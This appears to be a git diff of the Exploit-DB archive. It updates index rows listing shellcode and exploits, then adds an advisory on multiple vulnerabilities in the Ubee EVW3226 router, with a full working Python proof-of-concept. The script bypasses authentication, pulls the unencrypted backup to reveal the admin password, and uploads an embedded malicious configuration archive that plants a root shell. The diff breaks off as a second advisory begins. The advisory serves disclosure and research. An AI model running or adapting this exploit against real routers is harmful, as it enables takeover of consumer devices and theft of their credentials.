'/etc/passwd' with sys_chmod syscall shellcode (39 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0 13726,platforms/lin_x86/shellcode/13726.txt,"Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) shellcode (45 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0 13728,platforms/lin_x86/shellcode/13728.c,"Linux/x86 - sys_setuid(0) & sys_setgid(0) & execve (_/bin/sh_) shellcode (39 bytes)",2010-06-01,gunslinger_,lin_x86,shellcode,0 13729,platforms/win_x86-64/shellcode/13729.txt,"Windows 7 x64 - cmd Shellcode (61 bytes)",2010-06-01,agix,win_x86-64,shellcode,0 @@ -13550,7 +13550,7 @@ id,file,description,date,author,platform,type,port 15612,platforms/php/webapps/15612.txt,"SiteEngine <= 7.1 - SQL Injection",2010-11-25,Beach,php,webapps,0 15613,platforms/windows/dos/15613.py,"NCH Officeintercom <= 5.20 - Remote Denial of Service",2010-11-25,"xsploited security",windows,dos,0 15615,platforms/php/webapps/15615.html,"Frog CMS 0.9.5 - Multiple Vulnerabilities",2010-11-25,"High-Tech Bridge SA",php,webapps,0 -15616,platforms/arm/shellcode/15616.c,"Linux/ARM - Add root user _shell-storm_ with password _toor_ shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",arm,shellcode,0 +15616,platforms/arm/shellcode/15616.c,"Linux/ARM - Add root user 'shell-storm' with password 'toor' shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",arm,shellcode,0 15617,platforms/multiple/remote/15617.txt,"VMware 2 Web Server - Directory Traversal",2010-11-25,clshack,multiple,remote,0 15618,platforms/osx/shellcode/15618.c,"OS-X/Intel - setuid shell x86_64 shellcode (51 bytes)",2010-11-25,"Dustin Schultz",osx,shellcode,0 15619,platforms/linux/dos/15619.c,"Linux Kernel <= 2.6.37 - 'setup_arg_pages()' Denial of Service",2010-11-26,"Roland McGrath",linux,dos,0 @@ -14987,7 +14987,7 @@ id,file,description,date,author,platform,type,port 17221,platforms/php/webapps/17221.txt,"kusaba x <= 0.9.1 - Multiple Vulnerabilities",2011-04-28,"Emilio Pinna",php,webapps,0 17222,platforms/linux/dos/17222.c,"libmodplug <= 0.8.8.2 - (.abc) Stack-Based Buffer Overflow PoC",2011-04-28,epiphant,linux,dos,0 17223,platforms/windows/local/17223.pl,"NetOp Remote Control 8.0 / 9.1 / 9.2 / 9.5 - Buffer Overflow",2011-04-28,chap0,windows,local,0 -17224,platforms/osx/shellcode/17224.s,"OS-X/Intel - reverse_tcp shell x86_64 shellcode (131 bytes)",2011-04-29,hammackj,osx,shellcode,0 +17224,platforms/osx/shellcode/17224.s,"OS-X/Intel (x86_64) - reverse_tcp shell shellcode (131 bytes)",2011-04-29,hammackj,osx,shellcode,0 17225,platforms/windows/local/17225.rb,"Subtitle Processor 7.7.1 - (.m3u) SEH Unicode Buffer Overflow",2011-04-28,Metasploit,windows,local,0 17226,platforms/php/webapps/17226.txt,"phpGraphy 0.9.13b - Multiple Vulnerabilities",2011-04-29,"High-Tech Bridge SA",php,webapps,0 17227,platforms/windows/dos/17227.py,"Microsoft Office Excel Axis Properties Record Parsing Buffer Overflow PoC",2011-04-29,webDEViL,windows,dos,0 @@ -15155,7 +15155,7 @@ id,file,description,date,author,platform,type,port 17436,platforms/php/webapps/17436.txt,"iSupport 1.8 - SQL Injection",2011-06-23,"Brendan Coles",php,webapps,0 17437,platforms/jsp/webapps/17437.txt,"ManageEngine ServiceDesk Plus 8.0 - Directory Traversal",2011-06-23,"Keith Lee",jsp,webapps,0 17438,platforms/windows/remote/17438.txt,"IBM Web Application Firewall Bypass",2011-06-23,"Trustwave's SpiderLabs",windows,remote,0 -17439,platforms/sh4/shellcode/17439.c,"Linux/SuperH (sh4) - Add root user _shell-storm_ with password _toor_ shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",sh4,shellcode,0 +17439,platforms/sh4/shellcode/17439.c,"Linux/SuperH (sh4) - Add root user 'shell-storm' with password 'toor' shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",sh4,shellcode,0 17441,platforms/windows/local/17441.py,"FreeAmp 2.0.7 - (.fat) Buffer Overflow Exploit",2011-06-23,"Iván García Ferreira",windows,local,0 17442,platforms/jsp/webapps/17442.txt,"manageengine support center plus 7.8 build <= 7801 - Directory Traversal",2011-06-23,xistence,jsp,webapps,0 17443,platforms/cgi/webapps/17443.txt,"ActivDesk 3.0 - Multiple security vulnerabilities",2011-06-23,"Brendan Coles",cgi,webapps,0 @@ -15767,7 +15767,7 @@ id,file,description,date,author,platform,type,port 18156,platforms/php/webapps/18156.txt,"php video script SQL Injection",2011-11-25,longrifle0x,php,webapps,0 18159,platforms/linux/dos/18159.py,"XChat Heap Overflow DoS",2011-11-25,"Jane Doe",linux,dos,0 18162,platforms/linux_mips/shellcode/18162.c,"Linux/MIPS - execve /bin/sh shellcode (48 bytes)",2011-11-27,rigan,linux_mips,shellcode,0 -18163,platforms/linux_mips/shellcode/18163.c,"Linux/MIPS - Add user(UID 0) _rOOt_ with password _pwn3d_ shellcode (164 bytes)",2011-11-27,rigan,linux_mips,shellcode,0 +18163,platforms/linux_mips/shellcode/18163.c,"Linux/MIPS - Add user(UID 0) 'rOOt' with password 'pwn3d' shellcode (164 bytes)",2011-11-27,rigan,linux_mips,shellcode,0 19400,platforms/php/webapps/19400.txt,"WordPress Website FAQ Plugin 1.0 - SQL Injection",2012-06-26,"Chris Kellum",php,webapps,0 18165,platforms/windows/dos/18165.txt,"siemens automation license manager <= 500.0.122.1 - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 18166,platforms/windows/dos/18166.txt,"Siemens SIMATIC WinCC Flexible (Runtime) - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 @@ -32061,7 +32061,7 @@ id,file,description,date,author,platform,type,port 35582,platforms/php/webapps/35582.txt,"ProjectSend r561 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 35583,platforms/php/webapps/35583.txt,"Piwigo 2.7.2 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 35584,platforms/php/webapps/35584.txt,"GQ File Manager 0.2.5 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 -35586,platforms/lin_x86-64/shellcode/35586.c,"Linux/x86-64 - Bind TCP 4444 Port Shellcode (81 bytes / 96 bytes with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 +35586,platforms/lin_x86-64/shellcode/35586.c,"Linux/x86-64 - Bind 4444/TCP Port Shellcode (81 bytes / 96 bytes with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 35585,platforms/php/webapps/35585.txt,"Codiad 2.4.3 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 35587,platforms/lin_x86-64/shellcode/35587.c,"Linux/x86-64 - Reverse TCP connect shellcode (77 to 85 bytes / 90 to 98 bytes with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 35588,platforms/php/remote/35588.rb,"Lotus Mail Encryption Server (Protector for Mail) - LFI to RCE",2014-12-22,"Patrick Webster",php,remote,9000 @@ -32826,7 +32826,7 @@ id,file,description,date,author,platform,type,port 36395,platforms/lin_x86/shellcode/36395.c,"Linux/x86 - Obfuscated execve(_/bin/sh_) shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36481,platforms/php/webapps/36481.txt,"WordPress TheCartPress Plugin 1.6 'OptionsPostsList.php' Cross Site Scripting",2011-12-31,6Scan,php,webapps,0 36397,platforms/lin_x86/shellcode/36397.c,"Linux/x86 - Reverse TCP Shell shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 -36398,platforms/lin_x86/shellcode/36398.c,"Linux/x86 - TCP Bind Shell 33333 Port Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 +36398,platforms/lin_x86/shellcode/36398.c,"Linux/x86 - Bind Shell 33333/TCP Port Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36407,platforms/php/webapps/36407.txt,"Elxis CMS 2009 administrator/index.php URI XSS",2011-12-05,"Ewerson Guimaraes",php,webapps,0 36408,platforms/php/webapps/36408.txt,"WordPress Pretty Link Plugin 1.5.2 - 'pretty-bar.php' Cross Site Scripting",2011-12-06,Am!r,php,webapps,0 36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 - 'fckeditor' Arbitrary File Upload",2011-12-06,HELLBOY,php,webapps,0 @@ -34427,7 +34427,7 @@ id,file,description,date,author,platform,type,port 38123,platforms/php/dos/38123.txt,"PHP Session Deserializer Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0 38124,platforms/android/remote/38124.py,"Android Stagefright - Remote Code Execution",2015-09-09,"Joshua J. Drake",android,remote,0 38125,platforms/php/dos/38125.txt,"PHP unserialize() Use-After-Free Vulnerabilities",2015-09-09,"Taoguang Chen",php,dos,0 -38126,platforms/osx/shellcode/38126.c,"OS-X/x86-64 - tcp 4444 port bind Nullfree shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",osx,shellcode,0 +38126,platforms/osx/shellcode/38126.c,"OS-X/x86-64 - 4444/TPC port bind Nullfree shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",osx,shellcode,0 38127,platforms/php/webapps/38127.php,"php - cgimode fpm writeprocmemfile bypass disable function demo",2015-09-10,ylbhz,php,webapps,0 38128,platforms/cgi/webapps/38128.txt,"Synology Video Station 1.5-0757 - Multiple Vulnerabilities",2015-09-10,"Han Sahin",cgi,webapps,5000 38129,platforms/php/webapps/38129.txt,"Octogate UTM 3.0.12 - Admin Interface Directory Traversal",2015-09-10,"Oliver Karow",php,webapps,0 @@ -35400,8 +35400,8 @@ id,file,description,date,author,platform,type,port 39227,platforms/hardware/remote/39227.txt,"FingerTec Fingerprint Reader - Remote Access and Remote Enrollment",2016-01-12,"Daniel Lawson",hardware,remote,0 39149,platforms/lin_x86-64/shellcode/39149.c,"Linux/x86-64 - Bind TCP Port Shellcode (103 bytes)",2016-01-01,Scorpion_,lin_x86-64,shellcode,0 39150,platforms/php/webapps/39150.txt,"Open Audit SQL Injection",2016-01-02,"Rahul Pratap Singh",php,webapps,0 -39151,platforms/lin_x86-64/shellcode/39151.c,"Linux/x86-64 - Bind TCP 4444 Port Shellcode (103 bytes)",2016-01-02,Scorpion_,lin_x86-64,shellcode,0 -39152,platforms/lin_x86-64/shellcode/39152.c,"Linux/x86-64 - TCP 4444 port Bindshell with Password Prompt shellcode (162 bytes)",2016-01-02,"Sathish kumar",lin_x86-64,shellcode,0 +39151,platforms/lin_x86-64/shellcode/39151.c,"Linux/x86-64 - Bind 4444/TCP Port Shellcode (103 bytes)",2016-01-02,Scorpion_,lin_x86-64,shellcode,0 +39152,platforms/lin_x86-64/shellcode/39152.c,"Linux/x86-64 - Bindshell 4444/TCP with Password Prompt shellcode (162 bytes)",2016-01-02,"Sathish kumar",lin_x86-64,shellcode,0 39153,platforms/php/webapps/39153.txt,"iDevAffiliate 'idevads.php' SQL Injection",2014-04-22,"Robert Cooper",php,webapps,0 39154,platforms/hardware/remote/39154.txt,"Comtrend CT-5361T Router password.cgi Admin Password Manipulation CSRF",2014-04-21,"TUNISIAN CYBER",hardware,remote,0 39155,platforms/linux/remote/39155.txt,"lxml 'clean_html' Function Security Bypass",2014-04-15,"Maksim Kochkin",linux,remote,0 @@ -35965,7 +35965,7 @@ id,file,description,date,author,platform,type,port 39755,platforms/windows/remote/39755.py,"Acunetix WVS 10 - Remote Command Execution (System)",2016-05-02,"Daniele Linguaglossa",windows,remote,0 39756,platforms/linux/remote/39756.rb,"Apache Struts Dynamic Method Invocation Remote Code Execution",2016-05-02,Metasploit,linux,remote,8080 39757,platforms/android/local/39757.txt,"QSEE - PRDiag* Commands Privilege Escalation Exploit",2016-05-02,laginimaineb,android,local,0 -39758,platforms/lin_x86-64/shellcode/39758.c,"Linux/x86-64 - Bind TCP Port 1472 shellcode (IPv6) (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 +39758,platforms/lin_x86-64/shellcode/39758.c,"Linux/x86-64 - Bind 1472/TCP shellcode (IPv6) (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 39759,platforms/php/webapps/39759.txt,"Alibaba Clone B2B Script - Admin Authentication Bypass",2016-05-04,"Meisam Monsef",php,webapps,80 39760,platforms/php/webapps/39760.txt,"CMS Made Simple < 2.1.3 & < 1.12.1 - Web Server Cache Poisoning",2016-05-04,"Mickaël Walter",php,webapps,80 39761,platforms/php/webapps/39761.txt,"Acunetix WP Security Plugin 3.0.3 - XSS",2016-05-04,"Johto Robbie",php,webapps,80 @@ -36055,7 +36055,7 @@ id,file,description,date,author,platform,type,port 39848,platforms/php/webapps/39848.py,"Job Script by Scubez - Remote Code Execution",2016-05-23,"Bikramaditya Guha",php,webapps,80 39849,platforms/php/webapps/39849.txt,"XenAPI 1.4.1 for XenForo - Multiple SQL Injections",2016-05-23,"Julien Ahrens",php,webapps,443 39850,platforms/asp/webapps/39850.txt,"AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure via XXE Injection",2016-05-24,"Mehmet Ince",asp,webapps,80 -39851,platforms/lin_x86/shellcode/39851.c,"Linux/x86 - TCP Bind Shell Port 4444 shellcode (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0 +39851,platforms/lin_x86/shellcode/39851.c,"Linux/x86 - Bind Shell Port 4444/TCP shellcode (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0 39852,platforms/java/remote/39852.rb,"Oracle Application Testing Suite (ATS) - Arbitrary File Upload",2016-05-25,Metasploit,java,remote,8088 39853,platforms/unix/remote/39853.rb,"Ubiquiti airOS Arbitrary File Upload",2016-05-25,Metasploit,unix,remote,443 39854,platforms/java/remote/39854.txt,"PowerFolder Server 10.4.321 - Remote Code Execution",2016-05-25,"Hans-Martin Muench",java,remote,0 @@ -36245,7 +36245,7 @@ id,file,description,date,author,platform,type,port 40051,platforms/php/webapps/40051.txt,"Ktools Photostore 4.7.5 - Multiple Vulnerabilities",2016-07-04,"Yakir Wizman",php,webapps,80 40052,platforms/lin_x86-64/shellcode/40052.c,"Linux/x86-64 - NetCat Bind Shell Shellcode (64 bytes)",2016-07-04,CripSlick,lin_x86-64,shellcode,0 40055,platforms/php/webapps/40055.py,"WordPress Real3D FlipBook Plugin - Multiple Vulnerabilities",2016-07-04,"Mukarram Khalid",php,webapps,80 -40056,platforms/lin_x86/shellcode/40056.c,"Linux/x86 - TCP Bind Shell Port 4444 shellcode (98 bytes)",2016-07-04,sajith,lin_x86,shellcode,0 +40056,platforms/lin_x86/shellcode/40056.c,"Linux/x86 - Bind Shell Port 4444/TCP shellcode (98 bytes)",2016-07-04,sajith,lin_x86,shellcode,0 40057,platforms/php/webapps/40057.txt,"WebCalendar 1.2.7 - Multiple Vulnerabilities",2016-07-04,hyp3rlinx,php,webapps,80 40058,platforms/php/webapps/40058.txt,"eCardMAX 10.5 - Multiple Vulnerabilities",2016-07-04,"Bikramaditya Guha",php,webapps,80 40060,platforms/jsp/webapps/40060.txt,"24online SMS_2500i 8.3.6 build 9.0 - SQL Injection",2016-07-06,"Rahul Raz",jsp,webapps,80 @@ -36274,6 +36274,7 @@ id,file,description,date,author,platform,type,port 40109,platforms/xml/webapps/40109.txt,"Apache Archiva 1.3.9 - Multiple CSRF Vulnerabilities",2016-07-13,"Julien Ahrens",xml,webapps,0 40110,platforms/lin_x86/shellcode/40110.c,"Linux/x86 - Reverse Shell using Xterm ///usr/bin/xterm -display 127.1.1.1:10 shellcode (68 bytes)",2016-07-13,RTV,lin_x86,shellcode,0 40112,platforms/cgi/webapps/40112.txt,"Clear Voyager Hotspot IMW-C910W - Arbitrary File Disclosure",2016-07-15,Damaster,cgi,webapps,80 +40145,platforms/windows/local/40145.txt,"Rapid7 AppSpider 6.12 - Local Privilege Escalation",2016-07-25,LiquidWorm,windows,local,0 40113,platforms/linux/remote/40113.txt,"OpenSSHD <= 7.2p2 - User Enumeration",2016-07-18,"Eddie Harari",linux,remote,22 40114,platforms/php/webapps/40114.py,"vBulletin 5.x/4.x - Persistent XSS in AdminCP/ApiLog via xmlrpc API (Post-Auth)",2014-10-12,tintinweb,php,webapps,0 40115,platforms/php/webapps/40115.py,"vBulletin 4.x - SQLi in breadcrumbs via xmlrpc API (Post-Auth)",2014-10-12,tintinweb,php,webapps,0 @@ -36299,3 +36300,18 @@ id,file,description,date,author,platform,type,port 40140,platforms/php/webapps/40140.txt,"TeamPass Passwords Management System 2.1.26 - Arbitrary File Download",2016-07-21,"Hasan Emre Ozer",php,webapps,80 40141,platforms/bsd/local/40141.c,"mail.local(8) (NetBSD) - Local Root Exploit (NetBSD-SA2016-006)",2016-07-21,akat1,bsd,local,0 40142,platforms/php/remote/40142.php,"Apache 2.4.7 & PHP <= 7.0.2 - openssl_seal() Uninitialized Memory Code Execution",2016-02-01,akat1,php,remote,0 +40146,platforms/linux/remote/40146.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Remote Command Execution (Metasploit)",2016-07-25,xort,linux,remote,8000 +40147,platforms/linux/remote/40147.rb,"Barracuda Spam & Virus Firewall 5.1.3.007 - Remote Command Execution (Metasploit)",2016-07-25,xort,linux,remote,8000 +40148,platforms/windows/local/40148.py,"MediaCoder 0.8.43.5852 - .m3u SEH Exploit",2016-07-25,"Karn Ganeshen",windows,local,0 +40149,platforms/php/webapps/40149.rb,"Drupal CODER Module 2.5 - Remote Command Execution (Metasploit)",2016-07-25,"Mehmet Ince",php,webapps,80 +40150,platforms/php/webapps/40150.txt,"CodoForum 3.2.1 - SQL Injection",2016-07-25,"Yakir Wizman",php,webapps,80 +40151,platforms/windows/local/40151.py,"CoolPlayer+ Portable 2.19.6 - .m3u Stack Overflow (Egghunter+ASLR bypass)",2016-07-25,"Karn Ganeshen",windows,local,0 +40153,platforms/php/webapps/40153.txt,"GRR Système de Gestion et de Réservations de Ressources 3.0.0-RC1 - Arbitrary File Upload",2016-07-25,kmkz,php,webapps,80 +40154,platforms/php/webapps/40154.txt,"PHP gettext (gettext.php) 1.0.12 - Unauthenticated Code Execution",2016-07-25,kmkz,php,webapps,0 +40155,platforms/php/dos/40155.txt,"PHP 7.0.8_ 5.6.23 and 5.5.37 - bzread() Out-of-Bounds Write",2016-07-25,"Hans Jerry Illikainen",php,dos,80 +40156,platforms/cgi/webapps/40156.py,"Ubee EVW3226 Modem/Router 1.0.20 - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",cgi,webapps,80 +40157,platforms/cgi/webapps/40157.py,"Technicolor TC7200 Modem/Router STD6.02.11 - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",cgi,webapps,80 +40158,platforms/hardware/webapps/40158.txt,"Hitron CGNV4 Modem/Router 4.3.9.9-SIP-UPC - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",hardware,webapps,80 +40159,platforms/hardware/webapps/40159.txt,"Compal CH7465LG-LC Modem/Router CH7465LG-NCIP-4.50.18.13-NOSH - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",hardware,webapps,80 +40160,platforms/hardware/webapps/40160.py,"Bellini/Supercook Wi-Fi Yumi SC200 - Multiple Vulnerabilities",2016-07-25,"James McLean",hardware,webapps,0 +40161,platforms/java/webapps/40161.txt,"Micro Focus Filr 2 2.0.0.421_ Filr 1.2 1.2.0.846 - Multiple Vulnerabilities",2016-07-25,"SEC Consult",java,webapps,9443 diff --git a/platforms/cgi/webapps/40156.py b/platforms/cgi/webapps/40156.py new file mode 100755 index 000000000..7b891739f --- /dev/null +++ b/platforms/cgi/webapps/40156.py @@ -0,0 +1,305 @@ +''' +Ubee EVW3226 modem/router multiple vulnerabilities +-------------------------------------------------- + +Platforms / Firmware confirmed affected: +- Ubee EVW3226, 1.0.20 +- Product page: http://www.ubeeinteractive.com/products/cable/evw3226 + +Vulnerabilities +--------------- +Insecure session management + +The web interface does not use cookies at all. If admin login is +successful, the IP address of the admin user is stored and everybody can +access the management interface with the same IP. + +Local file inclusion + +Setup.cgi can read any file with .htm extension using directory +traversal in the gonext parameter. Although the file must have htm +extension, the local file inclusion can be used to map directories, +because the response is different depending on whether directory exists +or not. + +POC: + +http:///cgi-bin/setup.cgi?gonext=../www/main2 + +Backup file is not encrypted + +Although the web interface requires a password for encrypting the backup +file, the encryption is not performed. In order to backup file password, +the plain password is stored in the backup file, which is a standard tgz +(gzipped tar) file with a simple header. + +Backup file disclosure + +When a user requests a backup file, the file is copied into www root in +order to make download possible. However, the backup file is not removed +from the www root after download. Since there is not any session check +required to download the backup file, an attacker is able to download it +without authentication from LAN until the next reboot. +Since the backup file is not encrypted and contains the plain admin +password, the router can be compromised from LAN. + +POC: + +http:///Configuration_file.cfg + +Authentication bypass (backdoor) + +The web interface bypasses authentication if the HTML request contains +the factoryBypass parameter. In this case a valid session is created and +the attacker can gain full control over the device. + +POC: + +http:///cgi-bin/setup.cgi?factoryBypass=1 + +Arbitrary code execution + +The configuration file restore function receives a compressed tar file, +which is extracted to the /tmp folder. Tar files may contain symbolic +links, which can link out from the extraction folder. By creating a +configuration file with a symbolic link and a folder which uses this +link, the attacker can write out from the backup folder and can +overwrite any file in the writable file-system. +Since www is copied to the writable file system at boot time (under +/tmp), the attacker can insert a new cgi script that executes arbitrary +code with root privileges. + +Default SSID and passphrase can be calculated + +The default SSID and passphrase are derived only from the MAC address. +Since the MAC address of the device is broadcasted via WiFi, the default +password can be calculated easily. +Combined with code execution and factory bypass, even a botnet of Ubee +routers can be deployed easily. + +Buffer overflow in configuration restore + +During the configuration restore process, the backup file password is +read from the pass.txt file. If the password is large enough (larger +than 65536), a stack based buffer overflow is caused, because the file +content is loaded with fscanf(“%s”) to a stack based local variable. The +stack based buffer overflow can be used to execute arbitrary code with +root privileges. + +Buffer overflow in configuration file request + +The web interface identifies the configuration file download request by +checking that the URL contains the Configuration_file.cfg string. If +this string is found, the whole URL is copied into a stack based buffer, +which can cause a buffer overflow. This stack based buffer overflow can +be used to execute arbitrary code with root privileges without +authentication. + +POC: + +http://192.168.0.1/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaConfiguration_file.cfg + +Buffer overflow in next file name + +The gonext variable in the POST requests specifies the HTML file, which +the cgi script should be loaded. If the gonext variable is large enough +(larger than 6512 bytes), a stack based buffer overflow is caused, which +can be used to execute arbitrary code with root privileges without +authentication. + +Communication on the UPC Wi-Free can be sniffed within the device + +The UPC Wi-Free communication is not separated correctly inside the +device, because the whole communication can be sniffed after gaining +root access to the device. + +Timeline +-------- +- 2015.06.24: Presenting the Ubee router problems to the CTO of UPC Magyarorszag +- 2015.07.16: UPC contacted Ubee and required some more proof about some specific problems +- 2015.07.16: Proofs, that the default passphrase calculation of the Ubee router was broken, were sent to UPC +- 2015.07.20: UPC requested the POC code +- 2015.07.21: POC code was sent to UPC +- 2015.07.30: We sent some new issues affecting the Ubee router and other findings in Technicolor TC7200 and Cisco EPC3925 devices to UPC +- Between 2015.07.31 and 08.12 there were several e-mail and phone communications between technical persons from Liberty Global to clarify the findings +- 2015.08.19: UPC sent out advisory emails to its end users to change the default WiFi passphrase +- 2015.09.16: Ubee Interactive also asked some questions about the vulnerabilities +- 2015.09.24: We sent detailed answers to Ubee Interactive +- 2016.01.27: UPC Magyarorszag send out a repeated warning to its end users about the importance of the change of the default passphrases. +- 2016.02.16: Face to face meeting with Liberty Global security personnel in Amsterdam headquarters +- 2016.02.18: A proposal was sent to Liberty Global suggesting a wardriving experiment in Budapest, Hungary to measure the rate of end users who are still using the default passphrases. + +POC +--- +POC script is available to demonstrate the following problems [3]: + +- Authentication bypass +- Unauthenticated backup file access +- Backup file password disclosure +- Code execution + +Video demonstration is also available [1], which presents the above problems and how these can be combined to obtain full access to the modem. + +Recommendations +--------------- +Since only the ISP can update the firmware, we can recommend for users to change the WiFi passphrase. + +Credits +------- +This vulnerability was discovered and researched by Gergely Eberhardt from SEARCH-LAB Ltd. (www.search-lab.hu) + +References +---------- +[1] http://www.search-lab.hu/advisories/secadv-20160720 +[2] https://youtu.be/cBclw7uUuO4 +[3] https://github.com/ebux/Cable-modems/tree/master/Ubee +''' +# +# POC code for Ubee EVW3226 +# +# Demonstrates the following vulnerabilities +# - Authentication bypass +# - Unauthenticated backup file access +# - Backup file password disclosure +# - Code execution +# +# Credit: Gergely Eberhardt (@ebux25) from SEARCH-LAB Ltd. (www.search-lab.hu) +# +# Advisory: http://www.search-lab.hu/advisories/secadv-20150720 + +import sys +import requests +import tarfile +import struct +import binascii +import re +import shutil + +config_data = binascii.unhexlify('00003226FFA486BE000001151F8B0808EB7D4D570400706F635F636F6E666967' + '2E74617200EDD53D4FC3301006E09BF32BDC30A78E9D3816AC8811898185D104' + '8B4404C7CA1DA4FC7B121A900A0296A66A153FCBF96BB15F9D8C0DCC2E1D68AD' + '87FA61A7EE8E65AEB48254C86C38CE247F351DA767CFFBBEE7308F1724D33106' + '5DDBD21FC7FEDD3F51DE20AE6933EBD5C6648B3CFF3D7F21BEE52F649E014BE1' + '00169EFFD5F5CDED9DC88A730896081B5E3ED6C97DED3859A43556B077DBF667' + '3FD6BFDA5F291052CB4CEA421502C6DF221707EEFF853A5BF1317BAC225B562D' + 'BB6C1D594709BD797BC1C86E88FBC6D46EBB1BC753AD4CF9641F1836AB389A96' + '3C8A38F2F83975968687A5389A062C712682200882E058BC0383AF448C000E0000') + +class ubee: + def __init__(self, addr, port): + self.addr = addr + self.port = port + self.s = requests.Session() + + def getUri(self, uri): + return 'http://%s:%d/%s'%(self.addr,self.port,uri) + + def authenticationBypass(self): + self.s.get(self.getUri('cgi-bin/setup.cgi?factoryBypass=1')) + self.s.get(self.getUri('cgi-bin/setup.cgi?gonext=main2')) + + def parseNVRam(self, nv): + o = 0x1c + pos = 2 + nvdata = {} + while(True): + stype = struct.unpack('!H', nv[o:o+2])[0] + slen = struct.unpack('!H', nv[o+2:o+4])[0] + sval = nv[o+4:o+4+slen] + nvdata[stype] = sval + pos += slen + o = o+slen+4 + if (o >= len(nv) ): + break + return nvdata + + def parseBackupFile(self, fname): + tar = tarfile.open("Configuration_file.cfg", "r:gz") + for tarinfo in tar: + if tarinfo.isreg(): + if (tarinfo.name == 'pass.txt'): + print 'config file password: %s'%(tar.extractfile(tarinfo).read()) + elif (tarinfo.name == '1'): + nvdata = self.parseNVRam(tar.extractfile(tarinfo).read()) + print 'admin password: %s'%(nvdata[3]) + tar.close() + + def saveBackup(self, r, fname): + if r.status_code == 200: + resp = '' + for chunk in r: + resp += chunk + open(fname, 'wb').write(resp[0xc:]) + + def createBackupFile(self, fname): + # get validcode (CSRF token) + r = self.s.get(self.getUri('cgi-bin/setup.cgi?gonext=RgSystemBackupAndRecoveryBackup')) + m = re.search('ValidCode = "([^"]+)"', r.text) + if (m == None): + print 'ValidCode is not found' + return + validCode = m.group(1) + + # create backup file + r = self.s.get(self.getUri('cgi-bin/setup.cgi?gonext=Configuration_file.cfg&Password=secretpass&ValidCode=%s')%(validCode)) + if (len(r.text) > 0): + self.saveBackup(r, fname) + + def downloadBackupFile(self, fname): + r = self.s.get(self.getUri('Configuration_file.cfg')) + if (len(r.text) > 0): + print len(r.text) + self.saveBackup(r, fname) + return True + return False + + def restoreConfigFile(self, fname = '', passwd = 'badpasswd'): + # get validcode (CSRF token) + r = self.s.get(self.getUri('cgi-bin/setup.cgi?gonext=RgSystemBackupAndRecoveryRestore')) + m = re.search('name="ValidCode" value="([^"]+)"', r.text) + if (m == None): + print 'ValidCode is not found' + return + validCode = m.group(1) + + # restore config file + if (fname == ''): + cfg_data = config_data + else: + cfg_data = open(fname, 'rb').read() + r = self.s.post(self.getUri('cgi-bin/restore.cgi'), files=(('ValidCode', (None, validCode)), ('PasswordStr', (None, passwd)), ('browse', cfg_data), ('file_name', (None, 'Configuration_file.cfg')))) + if (r.text.find('alert("Password Failure!")') > 0): + return True + else: + return False + + def getShellResponse(self): + r = self.s.get(self.getUri('cgi-bin/test.sh')) + print r.text + +#------------------------------------ + +if (len(sys.argv) < 2): + print 'ubee_evw3226_poc.py addr [port]' +addr = sys.argv[1] +port = 80 +if (len(sys.argv) == 3): + port = int(sys.argv[2]) + +# create ubee object +u = ubee(addr, port) + +# perform authentication bypass +u.authenticationBypass() +# download backup file if it is exists (auth is not required) +if (not u.downloadBackupFile('Configuration_file.cfg')): + # create and download backup file (auth required) + u.createBackupFile('Configuration_file.cfg') +# parse downloaded file and get admin and backup file password +u.parseBackupFile('Configuration_file.cfg') +# execute shell command in the router +if (u.restoreConfigFile()): + print 'Shell installed' + u.getShellResponse() +else: + print 'Shell install failed' \ No newline at end of file diff --git a/platforms/cgi/webapps/40157.py b/platforms/cgi/webapps/40157.py new file mode 100755 index 000000000..87cf1df63 --- /dev/null +++ b/platforms/cgi/webapps/40157.py @@ -0,0 +1,130 @@ +''' +Technicolor TC7200 modem/router multiple vulnerabilities +-------------------------------------------------------- + +Platforms / Firmware confirmed affected: +- Technicolor TC7200, STD6.02.11 +- Product page: 